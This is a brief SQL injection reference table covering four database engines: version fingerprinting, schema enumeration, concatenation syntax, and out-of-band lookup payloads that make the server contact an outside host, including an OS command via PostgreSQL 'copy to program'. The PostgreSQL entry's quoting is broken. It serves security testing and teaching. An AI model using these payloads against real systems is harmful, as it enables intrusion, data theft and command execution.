Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.
Database | Version Info |
---|---|
Oracle | SELECT banner FROM v$version SELECT version FROM v$instance |
Microsoft | SELECT @@version |
PostgreSQL | SELECT version() |
MySQL | SELECT @@version |
Listing tables and the columns they contain:
Database | Contents Info |
---|---|
Oracle | SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = 'Table Name' |
Microsoft | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' |
PostgreSQL | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' |
MySQL | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'Table Name' |
Database | Concatenation |
---|---|
Oracle | 'a'||'b' |
Microsoft | 'a'+'b' |
PostgreSQL | 'a'||'b' |
MySQL | 'a' 'b' (space) or CONCAT('a','b') |
Database | Lookup Syntax |
---|---|
Oracle | SELECT UTL_INADDR.get_host_address('domain') - requires elevated privileges |
Microsoft | exec master..xp_dirtree '//domain/a' |
PostgreSQL | copy (SELECT '') to program 'nslookup domain |
MySQL | These work only on Windows LOAD_FILE('\\\\domain\\a') SELECT ... INTO OUTFILE '\\\\domain\a' |